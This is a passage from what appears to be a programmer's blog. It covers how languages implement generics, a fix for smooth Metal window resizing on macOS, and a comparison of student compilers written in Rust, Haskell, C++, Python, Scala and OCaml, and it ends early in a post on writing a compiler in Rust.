This is how interface types are implemented in Go and dyn trait objects are implemented in Rust. When you cast a type to an interface type for something it implements, it creates a wrapper that contains a pointer to the original object and a pointer to a vtable of the type-specific functions for that interface. However this requires an extra layer of pointer indirection and a different layout, which is why sorting in Go uses an interface for the container with a Swap method instead of taking a slice of a Comparable interface, because it would require allocating an entire new slice of the interface types and then it would only sort that and not the original slice!

Object-oriented programming

Object oriented programming is a language feature that makes good use of the power of vtables. Instead of having separate interface objects that contain the vtables, object-oriented languages like Java just have a vtable pointer at the start of every object. Java-like languages have a system of inheritance and interfaces that can be implemented entirely with these object vtables.

As well as providing additional features, embedding vtables in every object also solves the earlier problem of needing to construct new interface types with indirection. Unlike Go, in Java the sorting function can just use the Comparable interface on types that implement it.

Reflection

Once you have vtables, it’s not too difficult to have the compiler also generate tables of other type information like field names, types and locations. This allows accessing all the data in a type with the same code that can inspect all the data in any other type. This can be used to add a “reflection” feature to your language which can be used to implement things like serialization and pretty printing for arbitrary types. As an extension of the boxing paradigm it has the same tradeoff that it only requires one copy of the code but requires a lot of slow dynamic lookups, which can lead to slow serialization performance.

Examples of languages with reflection features they use for serialization and other things include Java, C# and Go.

Dynamically typed languages

Reflection is very powerful and can do a lot of different metaprogramming tasks, but one thing it can’t do is create new types or edit the type information of existing values. If we add the ability to do this, as well as make the default access and modification syntaxes go through reflection, we end up with dynamically typed languages! The incredibly flexibility to do metaprogramming in languages like Python and Ruby comes from effectively super-powered reflection systems that are used for everything.

“But Tristan, that’s not how dynamic languages work, they just implement everything with hash tables!” you may say. Well, hash tables are just a good data structure for implementing editable type information tables! Also, that’s just how some interpreters like CPython do things. If you look at how a high performance JIT like V8 implements things, it looks a lot like vtables and reflection info! V8’s hidden classes (vtables and reflection info) and object layout are similar to what you might see in a Java VM, just with the capability for objects to change to a new vtable at runtime. This is not a coincidence because nothing is ever a coincidence: The person listed on Wikipedia as the creator of V8 previously worked on a high-performance Java VM.

Dictionary Passing

Another way of implementing dynamic interfaces than associating vtables with objects is to pass a table of the required function pointers along to generic functions that need them. This approach is in a way similar to constructing Go-style interface objects at the call site, just that the table is passed as a hidden argument instead of packaged into a bundle as one of the existing arguments.

This approach is used by Haskell type classes although GHC has the ability to do a kind of monomorphization as an optimization through inlining and specialization. Dictionary passing is also used by OCaml with an explicit argument in the form of first class modules, but there’s a proposal to add a mechanism to make the parameter implicit.

Swift Witness Tables

Swift makes the interesting realization that by using dictionary passing and also putting the size of types and how to move, copy and free them into the tables, they can provide all the information required to work with any type in a uniform way without boxing them. This way Swift can implement generics without monomorphization and without allocating everything into a uniform representation! They still pay the cost of all the dynamic lookups that all boxing-family implementations pay, but they save on the allocation, memory and cache-incoherency costs. The Swift compiler also has the ability to specialize (monomorphize) and inline generics within a module and across modules with functions annotated @inlinable to avoid these costs if it wants to, presumably using heuristics about how much it would bloat the code.

This functionality also explains how Swift can implement ABI stability in a way that allows adding and rearranging fields in structs, although they provide a @frozen attribute to opt out of dynamic lookups for performance reasons.

Intensional Type Analysis

One more way to implement interfaces for your boxed types is to add a type ID in a fixed part of the object like where a vtable pointer would go, then generate functions for each interface method that effectively have a big switch statement over all the types that implement that interface method and dispatch to the correct type-specific method.

I’m not aware of any languages that use this technique, but C++ compilers and Java VMs do something similar to this when they use profile-guided optimization to learn that a certain generic call site mostly acts on objects of certain types. They’ll replace the call site with a check for each common type and then a static dispatch for that common type, with the usual dynamic dispatch as a fallback case. This way the branch predictor can predict the common case branch will be taken and continue dispatching instructions through the static call.

Monomorphization

Now, the alternative approach to boxing is monomorphization. In the monomorphization approach we need to find some way to output multiple versions of our code for each type we want to use it with. Compilers have multiple phases of representations that the code passes through as it is compiled, and we theoretically can do the copying at any of these stages.

Generating source code

The simplest approach to monomorphization is to do the copying at the stage of the first representation: source code! This way the compiler doesn’t even have to have generics support in it, and this is what users of languages like C and Go, where the compiler doesn’t support generics, sometimes do.

In C you can use the preprocessor and define your data structure in a macro or a header that you include multiple times with different #defines. In Go there are scripts like genny that make this code generation process easy.

The downside of this is that duplicating source code can have a lot of warts and edge cases to look out for depending on the language, and also gives the compiler lots of extra work to do parsing and type checking basically the same code many times. Again depending on language and tools this method’s generics can be ugly to write and use, like how if you write one inside a C macro every line has to end with a backslash and all type and function names need to have the type name manually concatenated onto their identifiers to avoid collisions.

D string mixins

Code generation does have something going for it though, which is that you can generate the code using a fully powered programming language, and also it uses a representation that the user already knows.

Some languages that implement generics in some other way also include a clean way of doing code generation to address more general metaprogramming use cases not covered by their generics system, like serialization. The clearest example of this is D’s string mixins which enable generating D code as strings using the full power of D during the middle of a compile.

Rust procedural macros

A similar example but with a representation only one step into the compiler is Rust’s procedural macros, which take token streams as input and output token streams, while providing utilities to convert token streams to and from strings. The advantage of this approach is that token streams can preserve source code location information. A macro can directly paste code the user wrote from input to output as tokens, then if the user’s code causes a compiler error in the macro output the error message the compiler prints will correctly point to the file, line and columns of the broken part of the user’s code, but if the macro generates broken code the error message will point to the macro invocation. For example if you use a macro that wraps a function in logging calls and make a mistake in the implementation of the wrapped function, the compiler error will point directly to the mistake in your file, rather than saying the error occurred in code generated by the macro.

Syntax tree macros

Some languages do take the step further and offer facilities for consuming and producing Abstract Syntax Tree (AST) types in macros written in the language. Examples of this include Template Haskell, Nim macros, OCaml PPX and nearly all Lisps.

One problem with AST macros is that you don’t want to require users to learn a bunch of functions for constructing AST types as well as the base languages. The Lisp family of languages address this by making the syntax and the AST structure very simple with a very direct correspondence, but constructing the structures can still be tedious. Thus, all the languages I mention have some form of “quote” primitive where you provide a fragment of code in the language and it returns the syntax tree. These quote primitives also have a way to splice syntax tree values in like string interpolation. Here’s an example in Template Haskell:

-- using AST construction functions
genFn :: Name -> Q Exp
genFn f = do
  x <- newName "x"
  lamE [varP x] (appE (varE f) (varE x))

-- using quotation with $() for splicing
genFn' :: Name -> Q Exp
genFn' f = [| \x -> $(varE f) x |]

One disadvantage of doing procedural macros at the syntax tree level instead of token level is that syntax tree types often change with the addition of new language features, while token types can remain compatible. For example OCaml’s PPX system needs special infrastructure to migrate parse trees to and from the language version used by a macro. Whereas Rust has libraries that add parsing and quotation utilities so you can write procedural macros in a style similar to syntax tree macros. Rust even has an experimental library that tries to replicate the interface provided by reflection!

Templates

The next type of generics is just pushing the code generation a little further in the compiler. Templates as found in C++ and D are a way of implementing generics where you can specify “template parameters” on types and functions and when you instantiate a template with a specific type, that type is substituted into the function, and then the function is type checked to make sure that the combination is valid.

template <class T> T myMax(T a, T b) {
  return (a>b?a:b);
}

template <class T> struct Pair {
  T values[2];
};

int main() {
  myMax(5, 6);
  Pair<int> p { {5,6} };
  // This would give us a compile error inside myMax
  // about Pair being an invalid operand to `>`:
  // myMax(p, p);
}

One problem with the template system is that if you include a template function in your library and a user instantiates it with the wrong type they may get an inscrutable compile error inside your library. This is very similar to what can happen with libraries in dynamically typed languages when a user passes in the wrong type. D has an interesting solution to this which is similar to what popular libraries in dynamic languages do: just use helper functions to check the types are valid, the error messages will clearly point to the helpers if they fail! Here’s the same example in D, note the if in the signature and the generally better syntax (! is how you provide template parameters):

// We're going to use the isNumeric function in std.traits
import std.traits;

// The `if` is optional (without it you'll get an error inside like C++)
// The `if` is also included in docs and participates in overloading!
T myMax(T)(T a, T b) if(isNumeric!T) {
    return (a>b?a:b);
}

struct Pair(T) {
  T[2] values;
}

void main() {
  myMax(5, 6);
  Pair!int p = {[5,6]};
  // This would give a compile error saying that `(Pair!int, Pair!int)`
  // doesn't match the available instance `myMax(T a, T b) if(isNumeric!T)`:
  // myMax(p, p);
}

C++20 has a feature called “concepts” that serves the same purpose except with a design more like defining interfaces and type constraints.

Compile time functions

D’s templates have a number of extensions that allow you to use features like compile time function evaluation and static if to basically make templates act like functions that take a compile time set of parameters and return a non-generic runtime function. This makes D templates into a fully featured metaprogramming system, and as far as I understand modern C++ templates have similar power but with less clean mechanisms.

There’s some languages that take the “generics are just compile time functions” concept and run with it even further, like Zig:

fn Stack(comptime T: type) type {
    return struct {
        items: []T,
        len: usize,

        const Self = @This();
        pub fn push(self: Self, item: T) {
            // ...
        }
    };
}

Zig does this using the same language at both compile time and runtime, with functions split up based on parameters marked comptime. There’s another language that uses a separate but similar language at the meta level called Terra. Terra is a dialect of Lua that allows you to construct lower level C-like functions inline and then manipulate them at the meta level using Lua APIs as well as quoting and splicing primitives:

function MakeStack(T)
    local struct Stack {
        items : &T; -- &T is a pointer to T
        len : int;
    }
    terra Stack:push(item : T)
        -- ...
    end
    return Stack
end

Terra’s crazy level of metaprogramming power allows it to do things like implement optimizing compilers for domain specific languages as simple functions, or implement the interface and object systems of Java and Go in a library with a small amount of code. Then it can save out generated runtime-level code as dependency-free object files.

Rust generics

The next type of monomorphized generics of course moves the code generation one step further into the compiler, after type checking. I mentioned that the type of inside-the-library errors you can get with C++ are like the errors you can get in a dynamically typed language, this is of course because there’s basically only one type of type in template parameters, like a dynamic language. So that means we can fix the problem by adding a type system to our meta level and having multiple types of types with static checking that they support the operations you use. This is how generics work in Rust, and at the language level also how they work in Swift and Haskell.

In Rust you need to declare “trait bounds” on your type parameters, where traits are like interfaces in other languages and declare a set of functionality provided by the type. The Rust compiler will check that the body of your generic functions will work with any type conforming to your trait bounds, and also not allow you to use functionality of the type not declared by the trait bounds. This way users of generic functions in Rust can never get compile errors inside a library function when they instantiate it. The compiler also only has to type check each generic function once.

fn my_max<T: PartialOrd>(a: T, b: T) -> T {
    if a > b { a } else { b }
}

struct Pair<T> {
    values: [T; 2],
}

fn main() {
    my_max(5,6);
    let p: Pair<i32> = Pair { values: [5,6] };
    // Would give a compile error saying that
    // PartialOrd is not implemented for Pair<i32>:
    // my_max(p,p);
}

At the language level this is very similar to the kind of type system you need to implement generics with interface support using the boxing approach to generics, which is why Rust can support both using the same system! Rust 2018 even added a uniform syntax where a v: &impl SomeTrait parameter gets monomorphized but a v: &dyn SomeTrait parameter uses boxing. This property also allows compilers like Swift’s and Haskell’s GHC to monomorphize as an optimization even though they default to boxing.

Machine code monomorphization

The logical next step in monomorphized generics models is pushing it further in the compiler, after the backend. Just like we can copy source code templates that are annotated with placeholders for the generic type, we can generate machine code with placeholders for the type-specific parts. Then we can stamp these templates out very quickly with a memcpy and a few patches like how a linker works! The downside is that each monomorphized copy couldn’t be specially optimized by the optimizer, but because of the lack of duplicate optimization, compilation can be way faster. We could even make the code stamper a tiny JIT that gets included in binaries and stamps out the monomorphized copies at runtime to avoid bloating the binaries.

Actually I’m not aware of any language that works this way, it’s just an idea that came to me while writing as a natural extension of this taxonomy, which is exactly the kind of thing I hoped for from this exercise! I hope this post gives you a clearer picture of the generics systems in different languages and how they can be fit together into a coherent taxonomy, and prompts you to think about the directions in concept-space where we might find new cool programming languages.

Glitchless Metal Window Resizing

2019-06-19T00:00:00+00:00

There’s a problem with Apple’s Metal MTKView on macOS which is that seemingly nobody can figure out how to get smooth window resizing to work properly. I just figured it out, more on that later. If you reposition the triangle in Apple’s Hello Triangle program to the left (to make the rescaling more apparent) then you can see it judders horribly when the window is resized:

What’s happening is often the new Metal frame doesn’t arrive in time and it draws a stretched version of the previous frame instead. There’s a number of places on the internet dating back to 2017 with various people encountering the problem:

Basically everyone who tries to make something with Metal that’s not a game runs into this problem and it looks horrible. As far as I can tell nobody has figured out how to fix it properly before and posted about it afterwards. Note in the first dev forums thread that an Apple employee claimed they were looking into this problem almost a year ago with no resolution.

I started a test project to try out different ways of drawing with Metal during resize to see if I could get any of them to work properly. First I replicated the MTKView problems and tried to fix them by tweaking lots of different things, including all three modes of triggering draws listed in the docs and using presentsWithTransaction in the way the docs suggest but nothing helped. Then I made a version using Core Graphics and an NSView subclass and stacked it below my Metal view so that I could have a reference that worked properly.

The Solution

Then I tried the accepted answer by Max on the Stack Overflow post which uses CAMetalLayer and some resizing-related properties. This reduced the frequency of glitches quite a bit, but didn’t eliminate them. So I added in presentsWithTransaction = true, which wasn’t enough on its own, but combining that with commandBuffer.waitUntilScheduled() then presenting as suggested in the Apple CAMetalLayer docs fixed all the glitches! I also needed to do some size conversion to make the accepted answer’s recipe draw crisply on high DPI displays.

Edit: @CoreyDotCom on Twitter reminded me I forgot to mention something. If you follow the recipe from the Stack Overflow post, it will appear to be glitch-free, but it actually isn’t. The layerContentsPlacement = .topLeft makes the glitches manifest as small broken slices near the moving window edge, which are very difficult to notice since the edge is moving quickly. When you change the placement policy to layerContentsPlacement = .scaleAxesIndependently to match the behavior of MTKView you see that there are still occasional glitches. Corey reports frame rate issues with presentsWithTransaction, and if this is the case for you as well it may be preferable to just mask the occasional remaining glitches with the top left placement policy.

Working Code

I now have a Metal triangle test program that resizes smoothly and without judder.

Check out my test project: Github repo

And the specific code file containing the working recipe: MetalLayerView

In the gif below the top is the broken MTKView, the middle NSView, and the bottom the working CAMetalLayer recipe. Contrast the shakey left edge of the top triangle with the stable bottom one:

Comparing the Same Project in Rust, Haskell, C++, Python, Scala and OCaml

2019-04-29T00:00:00+00:00

During my final term at UWaterloo I took the CS444 compilers class with a project to write a compiler from a substantial subset of Java to x86, in teams of up to three people with a language of the group’s choice. This was a rare opportunity to compare implementations of large programs that all did the same thing, written by friends I knew were highly competent, and have a fairly pure opportunity to see what difference design and language choices could make. I gained a lot of useful insights from this. It’s rare to encounter such a controlled comparison of languages, it’s not perfect but it’s much better than most anecdotes people use as the basis for their opinions on programming languages.

We did our compiler in Rust and my first comparison was with a team that used Haskell, which I expected to be much terser, but their compiler used similar amounts or more code for the same task. The same was true for a team that used OCaml. I then compared with a team that used C++, and as expected their compiler was around 30% larger largely due to headers and lack of sum types and pattern matching. The next comparison was my friend who did a compiler on her own in Python and used less than half the code we did because of the power of metaprogramming and dynamic types. A friend whose team used Scala also had a smaller compiler than us. The comparison that surprised me most though was with another team that also used Rust, but used 3 times the code that we did, because of different design decisions. In the end, the largest difference in the amount of code required was within the same language!

I’ll go over why I think this is a good comparison, some information on each project, and I’ll explain some of the sources of the differences in compiler size. I’ll also talk about what I learned from each comparison. Feel free to use these links to skip ahead to what interests you:

Why I think this is insightful
Rust (baseline)
Haskell: 1.0-1.6x the size depending on how you count for interesting reasons
C++: 1.4x the size for mundane reasons
Python: half the size because of fancy metaprogramming!
Rust (other group): 3x the size because of different design decisions!
Scala: 0.7x the size
OCaml: 1.0-1.6x the size depending on how you count, similar to Haskell

Why I think this is insightful

Now before you reply that amount of code (I compared both lines and bytes) is a terrible metric, I think that it can provide a good amount of insight in this case for a number of reasons. This is at least subjectively the most well controlled instance of different teams writing the same large program that I’ve ever heard of or read about.

Nobody (including me) knew I would ask this until after we were done, so nobody was trying to game the metric, everyone was just doing their best to finish the project quickly and correctly.
Everyone (with the exception of the Python project I’ll discuss later) was implementing a program with the sole goal of passing the same automated test suite by the same deadlines, so the results can’t be confounded much by some groups deciding to solve different/harder problems.
The project was done over a period of months, with a team, and needed to be gradually extended and pass both known and unknown tests. This means that it was helpful to write clean understandable code and not hack everything together.
Other than passing the course tests, the code wouldn’t be used for anything else, nobody would read it and being a compiler for a limited subset of Java to textual assembly it wouldn’t be useful.
No libraries other than the standard library were allowed, and no parsing helpers even if they’re in the standard library. This means the comparison can’t be confounded by powerful compiler libraries not used by all teams.
There were secret tests which we couldn’t see that were run once after the final submission deadline, which meant there was an incentive to write your own test code and make sure that your compiler was robust, correct and could handle tricky edge cases.
While everyone involved was a student, the teams I talk about are all composed of people I consider quite competent programmers. Everyone has at least 2 years of full time work experience doing internships, mostly at high end tech companies sometimes even working on compilers. Nearly all have been programming for 7-13 years and are enthusiasts who read a lot on the internet beyond their courses.
Generated code wasn’t counted, but grammar files and code that generated code was counted.

Thus I think the amount of code provides a decent approximation of how much effort each project took, and how much there would be to maintain if it was a longer term project. I think the smaller differences are also large enough to rule out extraordinary claims, like the ones I’ve read that say writing a compiler in Haskell takes less than half the code of C++ by virtue of the language.

Rust (baseline)

Me and one of my teammates had each written over 10k lines of Rust before, and my other teammate had written maybe 500 lines of Rust for some hackathon projects. Our compiler was 6806 lines by wc -l, 5900 source lines of code (not including blanks and comments), and 220kb by wc -c.

One thing I discovered is that these measures were related by approximately the same factors in the other projects where I checked, with minor exceptions that I’ll note. For the rest of the post when I refer to lines or amount I mean by wc -l, but this result means it doesn’t really matter (unless I note a difference) and you can convert with a factor.

I wrote another post describing our design, which passed all the public and secret tests. It also included a few extra features that we did for fun and not to pass tests, that probably added around 400 extra lines. Also around 500 lines of our total was unit tests and a test harness.

Haskell

The Haskell team was composed of two of my friends who’d written maybe a couple thousand lines of Haskell each before plus reading lots of online Haskell content, and a bunch more in other similar functional languages like OCaml and Lean. They had one other teammate who I didn’t know well but seems like a strong programmer and had used Haskell before.

Their compiler was 9750 lines by wc -l, 357kb and 7777 SLOC. This team also had the only significant differences between measure ratios, with their compiler being 1.4x the lines, 1.3x the SLOC, and 1.6x the bytes. They didn’t implement any extra features but passed 100% of public and secret tests.

It’s important to note that including the tests is the least fair to this team since they were the most thorough with correctness, with 1600 lines of tests, they caught a few edge cases that our team did not, they just happened to not be edge cases that were tested by the course tests. So not counting tests on both sides (8.1kloc vs 6.3kloc) their compiler was only 1.3x the raw lines.

I also am inclined towards bytes as the more reasonable measure of amount of code here because the Haskell project has longer lines on average since it doesn’t have lots of lines dedicated to just a closing brace, and it’s one-liner function chains aren’t split onto a bunch of lines by rustfmt.

Digging into the difference in size with one of my friends on the team, we came up with the following to explain the difference:

We used a hand-written lexer and recursive descent parsing, where they used a NFA to DFA lexer generator, and an LR parser and then a pass to turn the parse tree into an AST (Abstract Syntax Tree, a more convenient representation of the code). This took them substantially more code, 2677 lines compared to our 1705, for about an extra 1k lines.
They used a fancy generic AST type that transitioned to different type parameters as more information was added in each pass. This is and more helper functions for rewriting are probably why their AST code has about 500 lines more than our implementation where we build with struct literals and mutate Option<_> fields to add information as passes progress.
They have about 400 more lines of code in their code generation that are mostly attributable to more abstraction necessary to generate and combine code in a purely functional way where we just use mutation and string writing.

These differences plus the tests explain all of the difference in lines. In fact our files for middle passes like constant folding and scope resolution are very close to the same size. However that still leaves some difference in bytes because of longer average lines, which I’d guess is because they require more code to rewrite their whole tree at every pass where we just use a visitor with mutation.

Bottom line, I’d say setting aside design decisions Rust and Haskell are similarly expressive, with maybe a slight edge to Rust because of ability to easily use mutation when it’s convenient. It was also interesting to learn that my choice to use a recursive descent parser and hand-written lexer paid off, this was a risk since it wasn’t what the professor recommended and taught but I figured it would be easier and was right.

Haskell fans my object that this team probably didn’t use Haskell to its fullest potential and if they were better at Haskell they could have done the project with way less code. I believe that someone like Edward Kmett could write the same compiler in substantially fewer lines of Haskell, in that my friend’s team didn’t use a lot of fancy super advanced abstractions, and weren’t allowed to use fancy combinator libraries like lens. However, this would come at a cost to how difficult it would be to understand the compiler. The people on the team are all experienced programmers, they knew that Haskell can do extremely fancy things but chose not to pursue them because they figured it would take more time to figure them out than they would save and make their code harder for the teammates who didn’t write it to understand. This seems like a real tradeoff to me and the claim I’ve seen of Haskell being magical for compilers devolves into something like “Haskell has an extremely high skill cap for writing compilers as long as you don’t care about maintainability by people who aren’t also extremely skilled in Haskell” which is less generally applicable.

Another interesting thing to note is that at the start of every offering of the course the professor says that students can use any language that can run on the school servers, but issues a warning that teams using Haskell have the highest variance in mark of any language, with many teams using Haskell overestimating their ability and crashing and burning then getting a terrible mark, more than any other language, while some Haskell teams do quite well and get perfect like my friends.

C++

Next I talked to my friend who was on a team using C++, I only knew one person on this team, but C++ is used in multiple courses at UWaterloo so presumably everyone on the team had C++ experience.

Their project was 8733 raw lines and 280kb not including test code but including around 500 lines of extra features. Making it 1.4x the size of our non-test code that also had around 500 lines of extra features. They passed 100% of public tests but only passed 90% of secret tests, presumably because they didn’t implement the fancy array vtables required by the spec, which take maybe 50-100 lines of code.

I didn’t dig very deeply into these differences with my friend. I speculate that it’s mostly explained by:

Them using an LR parser and tree rewriter instead of a recursive descent parser
The lack of sum types and pattern matching in C++, which we used extensively and were very helpful.
Needing to duplicate all the signatures in header files, which Rust doesn’t have.

Another thing we compared was compile times. On my laptop our compiler takes 9.7s for a clean debug build, 12.5s for clean release, and 3.5s for incremental debug. My friend didn’t have timings on hand for their C++ build (using parallel make) but said those sounded quite similar to his experience, with the caveat that they put the implementations of a bunch of small functions in header files to save the signature duplication at the cost of longer times (this is also why I can’t measure the pure header file line count overhead).

Python

I have one friend who is an extraordinarily good programmer who chose to do the project alone and in Python. She also implemented more extra features (for fun) than any other team including an SSA intermediate representation with register allocation and other optimizations. On the other hand because she was working alone and implementing a bunch of extra features, she dedicated the least effort to code quality, for example by throwing an undifferentiated exception for all errors (relying on backtraces for debugging) instead of having error types and messages like we did.

Her compiler was 4581 raw lines and passed all public and secret tests. She also implemented way more extra features than any other team I compare with, but it’s hard to determine how extra code that took because many of her extra features were more powerful versions of simple things everyone needed to implement like constant folding and code generation. The extra features probably account for 1000-2000 lines at least though, so I’m confident her code was at least twice as expressive as ours.

One large part of this difference is likely dynamic typing. Our ast.rs alone has 500 lines of type definitions, and there are many more types defined throughout our compiler. We also are always constrained in what we do by the type system. For example we need infrastructure for ergonomically adding new info to our AST as it progresses through passes and accessing that later. Whereas in Python you can just set new fields on your AST nodes.

Powerful metaprogramming also explains part of the difference. For example although she used an LR parser instead of a recursive descent parser, in her case I think it needed less code, because instead of a tree rewriting pass, her LR grammar included Python code snippets to construct the AST, which the generator could turn into Python functions using eval. Part of the reason we didn’t use an LR parser is because constructing an AST without a tree rewriting pass would require a lot of ceremony (either generating Rust files or procedural macros) to tie the grammar to snippets of Rust code.

Another example of the power of metaprogramming and dynamic typing is that we have a 400 line file called visit.rs that is mostly repetitive boilerplate code implementing a visitor on a bunch of AST structures. In Python this could be a short ~10 line function that recursively introspects on the fields of the AST node and visits them (using the __dict__ attribute).

As a fan of Rust and statically typed languages in general I’m inclined to point out that the type system is very helpful for avoiding bugs and for performance. Fancy metaprogramming can also make it more difficult to understand how code works. However, this comparison surprised me in that I hadn’t expected the difference in the amount of code to be quite so large. If the difference in general is really close to needing to write twice the amount of code, I still think Rust is worth the tradeoff, but 2x is nothing to sneeze at and in the future I’ll be more inclined to hack something together in Ruby/Python if I just need to get it done quickly without a team and then throw it away after.

Rust (other group)

The last comparison I did and also the most interesting to me was with my friend who did the project in Rust with one teammate (who I didn’t know). My friend had a good amount of Rust experience having contributed to the Rust compiler and done lots of reading, I don’t know about his teammate.

Their project was 17,211 raw lines, 15k source lines, and 637kb not including test code and generated code. It had no extra features and passed only 4/10 secret tests and 90% of the public code generation tests, because they didn’t find the time before the final deadline to implement fancier pieces of the spec. This is 3 times the size of our compiler written in the same language, but with strictly less functionality!

This result was really surprising to me and dwarfed all the between-language differences I had investigated thus far. So we compared wc -l file size listings, as well as spot checking how we each implemented some specific things that had very different code sizes.

It seems to come down to consistently making different design decisions. For example, their front end (lexing, parsing, AST building) is 7597 raw lines to our 2164. They used a DFA-based lexer and LALR(1) parser, but the other groups did similar things without as much code. Looking at their weeder file, I noticed a number of different design decisions:

They chose to use a fully typed parse tree instead of the standard string-based homogeneous parse tree. This presumably required a lot more type definitions and additional transformation code in the parsing stage or a more complex parser generator.
They used TryFrom trait implementations for converting between the parse tree types and the AST types while validating their correctness. This lead to tons of 10-20 line impl blocks. We used functions that returned Result types to accomplish the same thing, which had less line overhead and also freed us from the type structure a bit more, making parameters and re-use easier. Some things that for us were single line match branches were 10 line impl statements for them.
Our types were structured in a way that required less copy-pasting. For example they used separate is_abstract, is_native and is_static fields whose constraint checking code needed to be copy-pasted twice, once for their void-typed methods and once for their methods with a return type, with slight modifications. Whereas for us void was just a special type, and we came up with a taxonomy of modifiers into mode and visibility enums that enforced the constraints at the type level and constraint errors were generated in the default case of the match statement that translated the modifier sets to the mode and visibility.

I didn’t look at the code of the analysis passes of their compiler, but they are similarly large. I talked to my friend and it seems they didn’t implement anything like the visitor infrastructure that we did. I’m guessing this along with some other smaller design differences account for the size difference of this part. The visitor allowed our analysis passes to only pay attention to the parts of the AST they needed instead of having to pattern match down through the entire AST structure, saving a lot of code.

Their code generation is 3594 lines where ours is 1560. I looked at their code for this and it seems that nearly all of the difference is that they chose to have an intermediate data structure for assembly instructions, where we just used string formatting to directly output assembly. This required defining types and output functions for all the instructions and operand types they used. It also meant that constructing assembly instructions took way more code, where we might have a formatting statement that used terse instructions like mov ecx, [edx], they needed a giant statement rustfmt split over 6 lines which constructed the instruction with a bunch of intermediate nested types for the operands involving 6 levels of nested parentheses at its deepest. We could also output blocks of related instructions like a function preamble in one formatting statement, where they had to do the full construction for each instruction.

Our team considered using such an abstraction. It would make it easier to have the option of either outputting textual assembly or directly emitting machine code, however that wasn’t a requirement of the course. The same thing could also be accomplished with less code and better performance using an X86Writer trait with methods like push(reg: Register). Another angle we considered was that it might make debugging and testing easier, but we realized that looking at the generated textual assembly would actually be easier to read and test with snapshot testing as long as we inserted comments liberally. But we (apparently correctly) predicted that it would take a lot of extra code, and there wasn’t any real benefit given what we knew we were going to need, so we didn’t bother.

A good comparison is with the intermediate representation the C++ group used as an extra feature, which only took them closer to 500 extra lines. They used a very simple structure (making for simple type definitions and construction code) that used operations close to what Java required. This meant that their IR was much smaller (and thus required less construction code) than the resulting assembly, since many language operations like calls and casts expanded into many assembly instructions. They also say it really helped debugging since it cut out a lot of the cruft and was easy to read. The higher level representation also allowed them to do some simple optimizations on their IR. The C++ team came up with a really nice design which got them much more benefit with much less code.

Overall it seems like the overall 3x size multiplier is due to consistently making different design decisions both large and small in the direction of larger code. They implemented a number of abstractions that we didn’t which added more code, and missed out on some of the abstractions we implemented which lead to less code.

This result really surprised me, I knew design decisions mattered but I wouldn’t have guessed beforehand that they would lead to any differences this large, given that I was only surveying people that I consider strong competent programmers. Of all the results from this comparison, this is the one I learned the most from. Something that I think helped was that I had read a lot about how to write compilers before I took the course, so I could take advantage of clever designs other people had come up with and found worked well like AST visitors and recursive descent parsing even when they weren’t taught in the course.

One thing this really made me think about is the cost of abstraction. Abstractions may make things easier to extend in the future, or guard against certain types of errors, but they need to be considered against the fact that you may end up with 3 times the amount of code to understand and refactor, 3 times the amount of possible locations for bugs and less time left to spend on testing and further development. Our course was unlike the real world in that we knew exactly what we needed to implement and that we’d never touch the code afterwards, which eliminates the benefits of pre-emptive abstraction. However if you were going to challenge me to extend a compiler with an arbitrary feature you’d tell me later, and I had to pick which compiler I’d start from, I’d choose ours even setting aside familiarity. Because there’d simply be much less code that I’d need to understand how to change, and I could potentially choose a better abstraction for the requirements (like the C++ team’s IR) once I knew how I needed to extend things.

It also solidified the taxonomy in my head of abstractions that you expect to remove code given only your current requirements, like our visitor pattern, and abstractions you expect to add code given only your immediate requirements, but that may provide extensibility, debuggability or correctness benefits.

Scala

I also talked to a friend of mine who did the project in a previous term using Scala, but the project and tests were the exact same ones. Their compiler was 4141 raw lines and ~160kb of code not counting tests. They passed 8/10 secret tests and 100% of public tests and didn’t implement any extra features. So comparing with our 5906 lines without extra features and tests, their compiler is 0.7x the size.

One design factor in their low line count was that they used a different approach to parsing. The course allowed you to use a command line LR table generator tool that the course provided, which this team used but no other team I mention did. This saved them having to implement an LR table generator. They also managed to avoid writing the LR grammar using a 150 line Python script which scraped a Java grammar web page they found online and translated it into the input format of the generator tool. They still needed to do some tree building in Scala but overall their parsing stage came in at 1073 lines to our 1443, where most other teams use of LR parsing lead to larger parsers than our recursive descent one.

The rest of their compiler was similarly smaller than ours though without any obvious large design differences, although I didn’t dig into the code. I suspect this is probably due to differences in expressiveness between Scala and Rust. Scala and Rust have similar functional programming features helpful for compilers, like pattern matching, but Scala’s managed memory saves on code required to make the Rust borrow checker happy. Scala also has more miscellaneous syntactic sugar than Rust.

OCaml

Since my team had all interned at Jane Street the other language we considered using was OCaml, we decided on Rust but I was curious about how OCaml might have turned out so I talked to someone else I knew had interned at Jane Street and they indeed did their compiler in OCaml with two other former Jane Street interns.

Their compiler was 10914 raw lines and 377kb including a small amount of test code and no extra features. They passed 9/10 secret tests and all public tests.

Like other groups it looks like a lot of the size difference is due to them using an LR parser generator and tree rewriting for parsing, as well as a regex->NFA->DFA conversion pipeline for lexing. Their front-end (lexing+parsing+AST construction) is 5548 lines where ours is 2164, with similar ratios for bytes. They also used expect tests for their parser where we used similar snapshot tests that put the expected output outside the code, so their parser tests were ~600 lines of that total where ours were ~200.

That leaves 5366 lines (461 lines of which is interface files with just type declarations) for the rest of their compiler and 4642 for ours, only 1.15x larger if you count interface files and basically the same size if you don’t count them. So it looks like setting aside our parsing design decisions, Rust and OCaml seem similarly expressive except that OCaml needs interface files and Rust doesn’t.

Conclusion

Overall I’m very glad I did this comparison, I learned a lot from it and was surprised many times. I think my overall takeaway is that design decisions make a much larger difference than the language, but the language matters insofar as it gives you the tools to implement different designs.

Writing a Compiler in Rust

2019-04-18T00:00:00+00:00

During my final term at UWaterloo I took the CS444 compilers class with a project to write a compiler from a substantial subset of Java to x86, with a language and two teammates of your choice. My group of three chose to write our compiler in Rust and it was a fun experience. We spent time coming to design decisions that worked out really well and used Rust’s strengths. Our compiler ended up being around 6800 lines of Rust and I personally put in around 60 hours of solid coding and more on code review and design. In this post I’ll go over some of the design decisions we made and some thoughts on what it was like using Rust.

Lexing and Parsing

The lectures for the course recommended writing an NFA to DFA compiler to implement the lexer, and writing an LR(1) parser generator for the parser, then having a separate “weeding” pass to construct a final AST (Abstract Syntax Tree) and validate it in various ways.

I suggested that we should try using a hand-written lexer and recursive descent parser instead, and my teammates agreed. A recursive descent parser allowed us to put all the code to parse, validate, and create the AST node in one place. We figured writing a pass to rewrite and validate the raw parse tree into a strongly typed AST would be about as much code as a recursive descent parser, except with the additional work of having to implement an LR(1) parser generator.

